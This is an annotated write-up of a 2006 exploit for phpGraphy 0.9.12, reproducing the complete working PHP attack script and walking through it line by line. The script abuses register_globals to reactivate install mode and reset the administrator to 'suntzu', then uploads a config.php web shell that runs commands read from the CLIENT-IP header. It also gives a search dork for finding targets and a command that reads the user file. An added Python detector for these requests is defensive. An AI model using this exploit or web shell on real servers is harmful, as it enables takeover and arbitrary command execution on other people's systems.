phpGraphy 0.9.12 Privilege Escalation and Remote Command Execution Exploit

What this paper is
This paper describes a vulnerability in phpGraphy version 0.9.12 that allows an attacker to escalate privileges and execute arbitrary commands on the web server. The exploit leverages a flaw in how the application handles user input, particularly when register_globals is enabled in the PHP configuration.
Simple technical breakdown
The exploit works in several stages:
- Bypassing Authentication/Activating Install Mode: The script first attempts to trick phpGraphy into thinking it's in an installation mode. This allows it to set a default administrator username and password ("suntzu"/"suntzu") without needing to know the current credentials.
- Logging in as Administrator: Once install mode is activated, the script logs in using the newly set "suntzu" credentials. This grants it administrative privileges within the phpGraphy application.
- Uploading a Malicious File: With administrative access, the script uploads a specially crafted PHP file named config.php into the web server's document root. This file contains a backdoor.
- Executing Commands: The script then sends a request to the uploaded config.php file and uses the CLIENT-IP HTTP header to pass the desired command to the backdoor. The backdoor executes the command and returns the output, which the exploit script captures and displays.
The core vulnerability is the application's trust in user-supplied data combined with its insecure handling of session and configuration state: with register_globals enabled, cookie and POST parameters such as install_mode and security_level become ordinary PHP variables that the application reads as internal state, so a client can overwrite them; the upload handler then accepts a filename ending in .php and stores it where the web server will execute it.
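As an added example (not part of the original advisory or the exploit script), the following Python detection logic checks raw HTTP requests in the same wire format the script builds for the three stages described above: a client-supplied install_mode cookie or security_level parameter (the register_globals overwrite), a picture upload whose filename carries a server-side script extension, and a Client-IP header that holds something other than an address. The sample requests and the host name gallery.example are constructed.

```python
import ipaddress
import re

# Extensions the web server would execute if the file lands in a served directory.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
MULTIPART_FILENAME = re.compile(r'filename="([^"]*)"', re.I)

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body).
    Header names are lower-cased so CLIENT-IP and Client-IP compare equal."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def parse_cookies(header):
    """Turn 'a=1; b=2;' into {'a': '1', 'b': '2'}, skipping empty entries."""
    cookies = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies

def find_indicators(raw):
    """Return the attack-chain indicators present in one raw request."""
    method, _path, headers, body = parse_request(raw)
    hits = []
    cookies = parse_cookies(headers.get("cookie", ""))
    # Stage 1: install_mode and security_level are server-side state; a client
    # sending them only pays off when register_globals lets it overwrite them.
    if "install_mode" in cookies:
        hits.append("install_mode cookie supplied by client")
    if "security_level=" in body:
        hits.append("security_level posted by client")
    # Stage 3: a server-side script extension inside a picture upload.
    ctype = headers.get("content-type", "").lower()
    if method == "POST" and ctype.startswith("multipart/form-data"):
        for fname in MULTIPART_FILENAME.findall(body):
            if SCRIPT_EXT.search(fname):
                hits.append("script upload: " + fname)
    # Stage 4: Client-IP should only ever carry an address, never a command.
    client_ip = headers.get("client-ip")
    if client_ip is not None:
        try:
            ipaddress.ip_address(client_ip)
        except ValueError:
            hits.append("non-IP Client-IP header")
    return hits

# Constructed sample traffic mirroring the three exploit stages (not a capture).
STAGE1_INSTALL_MODE = (
    "POST /phpgraphy/index.php?uid=0 HTTP/1.0\r\nHost: gallery.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: mode=um; install_mode=1; action=edit;\r\n\r\n"
    "login=suntzu&password=suntzu&security_level=999&uid=0&submit=Submit"
)
STAGE3_UPLOAD = (
    "POST /phpgraphy/index.php HTTP/1.0\r\nHost: gallery.example\r\n"
    "Content-Type: multipart/form-data; boundary=xyz\r\nCookie: config=; dir=.;\r\n\r\n"
    '--xyz\r\nContent-Disposition: form-data; name="pictures[]"; filename="config.php"'
    "\r\n\r\n<?php /* placeholder body */ ?>\r\n--xyz--\r\n"
)
STAGE4_COMMAND = (
    "GET /phpgraphy/config.php HTTP/1.0\r\nCLIENT-IP: ls -la\r\n"
    "Host: gallery.example\r\nConnection: Close\r\n\r\n"
)
```

Run find_indicators over each request a reverse proxy or WAF hands you; a legitimate gallery upload with a .jpg filename and a numeric Client-IP produces an empty list.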
Complete code and payload walkthrough
The provided PHP script is a command-line tool designed to exploit phpGraphy. Let's break down its components:
<?php
print_r('
---------------------------------------------------------------------------
PHPGraphy 0.9.12 Zend_Hash_Del_Key_Or_Index/privilege escalation/
/remote command execution exploit
by rgod
dork: intext:"This site is using phpGraphy" | intitle:"my phpgraphy site"
mail: retrog@alice.it
site: http://retrogod.altervista.org
---------------------------------------------------------------------------
');
/*
works against register_globals=on
*/
if ($argc<3) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path cmd OPTIONS
host: target server (ip/hostname)
path: path to PHPGraphy
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /phpgraphy/ ls -la -P1.1.1.1:80
php '.$argv[0].' localhost / cat ./data/users.dat -p81
---------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
//reset admin password...
//let's reactivate :) the *install mode* to do that
//you will be able to login with user -> suntzu, password -> suntzu
$data ="login=suntzu";
$data.="&password=suntzu";
$data.="&security_level=999"; //god
$data.="&uid=0";
$data.="&submit=Submit";
$packet ="POST ".$p."index.php?uid=0 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n";
$packet.="Referer: http://".$host.$path."index.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: mode=um; install_mode=1; 2095608056=1; -285023552=1; action=edit;\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(2);
//login as admin...
$data ="user=suntzu";
$data.="&pass=suntzu";
$data.="&dir=";
$data.="&rememberme=on";
$data.="&startlogin=1";
$packet ="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."index.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Connection: keep-alive\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$cookie="";
for ($i=1; $i<count($temp); $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
echo "cookie -> ".$cookie."\n";
sleep(1);
//upload the *evil* shell
//some tricks with "config" and "dir" to escape from the pictures/ dir, .htaccess protected
//you need a writable folder, if not succeeded try some of these paths: ./themes, ./docs, ./base
//for "dir" argument, let's create a *fake* config.php in main folder
$data='-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="pictures[]"; filename="config.php";
<?php set_time_limit(0);error_reporting(7);echo "my_delim"; passthru($_SERVER["HTTP_CLIENT_IP"]); echo "my_delim";?>
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="picupload"
1
-----------------------------7d61bcd1f033e--
';
$packet ="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http:/".$host.$path."index.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: config=; -578819025=1; -747504677=1; dir=.; 2087386682=1; 2090185412=1; ".$cookie."\r\n";
$packet.="Connection: keep-alive\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
//launch commands...
$packet ="GET ".$p."config.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("my_delim",$html)){
$temp=explode("my_delim",$html);
echo $temp[1];
}
else {
echo "exploit failed...";
}
?>
Code Fragment Explanations:
Header and Usage Information:
print_r('...');
- Purpose: Displays introductory information about the exploit: its author, the version targeted, and the search-engine dorks used to find installations.
- Practical Purpose: Informs the user about the exploit's context.
Argument Handling and Configuration:
if ($argc<3) { ... die; }
- Purpose: Checks that the minimum number of command-line arguments (script name, host, path) has been provided. If not, it prints usage instructions and exits.
- Practical Purpose: Ensures the script has the inputs it needs to run.
error_reporting(0);
- Purpose: Suppresses all PHP error reporting.
- Practical Purpose: Prevents noisy PHP warnings from interfering with the exploit's logic or output.
ini_set("max_execution_time",0);
- Purpose: Removes the PHP script execution time limit.
- Practical Purpose: Allows long-running commands or network operations without the script timing out.
ini_set("default_socket_timeout",5);
- Purpose: Sets the default timeout for socket operations (such as fsockopen) to 5 seconds.
- Practical Purpose: Prevents the script from hanging indefinitely if a connection fails.
Helper Functions:
function quick_dump($string)
- Purpose: A utility function that formats a string as a hexadecimal dump followed by its printable-ASCII rendering, 15 bytes per row.
- Practical Purpose: Useful for debugging or inspecting raw data; it is defined but never called by the exploit's core logic.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
- Purpose: Defines a regular expression that validates an ip:port proxy specification.
- Practical Purpose: Used to ensure the supplied proxy address is correctly formatted.
Network Communication Function:
function sendpacketii($packet)
- Purpose: The core function for sending HTTP requests to the target. It handles both direct connections and connections through a proxy.
- Inputs: $packet (the raw HTTP request string).
- Behavior:
- If $proxy is empty, it uses fsockopen to connect directly to $host on $port.
- If $proxy is provided, it validates the proxy format, then connects to the proxy server with fsockopen.
- It writes $packet to the socket.
- It reads the response into the global $html variable. For direct connections it reads line by line until EOF; for proxy connections it reads one byte at a time until the socket reaches EOF and the buffer contains a blank line (\r\n\r\n), the end of the response headers.
- It closes the socket.
- Outputs: Populates the global $html variable with the server's response.
- Practical Purpose: Abstracts the network communication used to send the crafted HTTP requests.
Argument Parsing and Initialization:
$host=$argv[1]; $path=$argv[2];
- Purpose: Assigns the target host and path from the command-line arguments.
- Practical Purpose: Sets the target for the exploit.
$port=80; $proxy="";
- Purpose: Initializes the default port to 80 and the proxy to empty.
- Practical Purpose: Sets default network parameters.
for ($i=3; $i<$argc; $i++){ ... }
- Purpose: Iterates over the remaining command-line arguments to parse the port (-p) and proxy (-P) options, and concatenates every other argument into $cmd, the command to execute.
- Practical Purpose: Allows customization of the target port, proxy usage, and the command to run.
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) { ... die; }
- Purpose: Validates that the provided path starts and ends with a forward slash, as the script expects for a web application path.
- Practical Purpose: Basic input validation for the target path.
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
- Purpose: Constructs the base path used in the request lines. When a proxy is used, the path becomes an absolute URL including host and port so the proxy can forward it.
- Practical Purpose: Prepares the target URL for constructing HTTP requests.
Stage 1: Reset Admin Password / Activate Install Mode:
$data ="login=suntzu"; ... $data.="&submit=Submit";
- Purpose: Prepares the POST data for a request to index.php with uid=0. It sets the username and password to "suntzu" together with security_level=999 (an attempt to obtain the highest privilege level); install_mode=1 is carried separately in the Cookie header of the same request.
- Practical Purpose: This is the initial step to bypass authentication by forcing the application into a state where attacker-chosen credentials are accepted.
$packet ="POST ".$p."index.php?uid=0 HTTP/1.0\r\n"; ... $packet.=$data;
- Purpose: Constructs the full HTTP POST request that triggers install-mode activation. It includes the usual headers (Host, User-Agent, Referer, Content-Type, Content-Length) and, crucially, a Cookie header containing install_mode=1.
- Practical Purpose: Sends the crafted request to the target to enable "install mode".
sendpacketii($packet); sleep(2);
- Purpose: Sends the packet and waits 2 seconds to let the server process the request.
- Practical Purpose: Executes the request and provides a delay.
Stage 2: Login as Administrator:
$data ="user=suntzu"; ... $data.="&startlogin=1";
- Purpose: Prepares the POST data for logging in with the "suntzu" credentials.
- Practical Purpose: Attempts to authenticate using the credentials set in the previous step.
$packet ="POST ".$p."index.php HTTP/1.0\r\n"; ... $packet.=$data;
- Purpose: Constructs the HTTP POST login request with standard headers and the login data.
- Practical Purpose: Sends the login request.
sendpacketii($packet);
- Purpose: Sends the login request.
$temp=explode("Set-Cookie: ",$html); ... $cookie.=" ".$temp2[0];
- Purpose: Parses the server's response ($html) for every Set-Cookie header and keeps the name=value; portion of each. These cookies carry the authenticated session.
- Practical Purpose: Captures the session cookies needed for subsequent authenticated requests.
echo "cookie -> ".$cookie."\n"; sleep(1);
- Purpose: Prints the captured cookies and waits 1 second.
- Practical Purpose: Debugging output and a small delay.
Stage 3: Upload Malicious Shell:
$data='-----------------------------7d61bcd1f033e ... -----------------------------7d61bcd1f033e--';
- Purpose: A multipart/form-data payload made up of the following parts:
- -----------------------------7d61bcd1f033e: boundary markers for the multipart data.
- Content-Disposition: form-data; name="pictures[]"; filename="config.php": tells the server that a file named config.php is being uploaded through the pictures[] form field.
- <?php set_time_limit(0);error_reporting(7);echo "my_delim"; passthru($_SERVER["HTTP_CLIENT_IP"]); echo "my_delim";?>: the PHP backdoor itself. set_time_limit(0) disables the script timeout; error_reporting(7) enables E_ERROR, E_WARNING and E_PARSE (1|2|4); echo "my_delim" prints a delimiter before and after the command output; passthru($_SERVER["HTTP_CLIENT_IP"]) is the core of the backdoor: passthru executes a command and writes its raw output, and the command is read from the Client-IP request header as exposed in the $_SERVER superglobal.
- Content-Disposition: form-data; name="picupload" with value 1: a second form field, most likely the upload form's submit flag.
- Practical Purpose: This payload creates a PHP file named config.php in a location served by the web server. The file acts as a remote command execution shell; the CLIENT-IP header is used to pass commands to $_SERVER["HTTP_CLIENT_IP"].
$packet ="POST ".$p."index.php HTTP/1.0\r\n"; ... $packet.=$data;
- Purpose: Constructs the HTTP POST request that uploads the malicious config.php. It uses multipart/form-data as the Content-Type with the matching boundary. The Cookie header is crucial here: it carries the session cookies obtained earlier plus an empty config value and dir=., which is used to control the upload directory.
- Practical Purpose: Sends the file upload request to the target.
sendpacketii($packet); sleep(1);
- Purpose: Sends the upload packet and waits 1 second.
- Practical Purpose: Executes the file upload.
Stage 4: Launch Commands:
$packet ="GET ".$p."config.php HTTP/1.0\r\n";
- Purpose: Constructs a GET request for the newly uploaded config.php.
- Practical Purpose: This is how the attacker triggers the backdoor.
$packet.="CLIENT-IP: ".$cmd."\r\n";
- Purpose: The critical part for command execution. It places the user-supplied command ($cmd) in the CLIENT-IP HTTP header; the backdoor in config.php reads this header and executes it.
- Practical Purpose: Delivers the arbitrary command to the server for execution.
$packet.="Host: ".$host."\r\n"; ... $packet.="\r\n";
- Purpose: Completes the HTTP GET request headers.
- Practical Purpose: Standard HTTP request formatting.
sendpacketii($packet);
- Purpose: Sends the request that executes the command.
if (eregi("my_delim",$html)){ ... echo $temp[1]; } else { echo "exploit failed..."; }
- Purpose: Checks the response ($html) for the "my_delim" marker. If present, it splits the response on the marker and prints the text between the two markers, which is the output of the executed command. If absent, it reports failure.
- Practical Purpose: Retrieves and displays the output of the executed command.
Payload/Shellcode Segments:
- Backdoor Payload: <?php set_time_limit(0);error_reporting(7);echo "my_delim"; passthru($_SERVER["HTTP_CLIENT_IP"]); echo "my_delim";?>
- Stage 1 (Initialization): set_time_limit(0); error_reporting(7); sets up the PHP environment for execution.
- Stage 2 (Delimiter): echo "my_delim"; prints a marker before the command output.
- Stage 3 (Command Execution): passthru($_SERVER["HTTP_CLIENT_IP"]); is the core: it takes the command from the CLIENT-IP HTTP header and executes it, and passthru outputs the raw result.
- Stage 4 (Delimiter): echo "my_delim"; prints a marker after the command output.
- Overall Purpose: This PHP snippet is a minimal web shell that executes arbitrary commands supplied via the CLIENT-IP header.
# milw0rm.com [2006-11-30]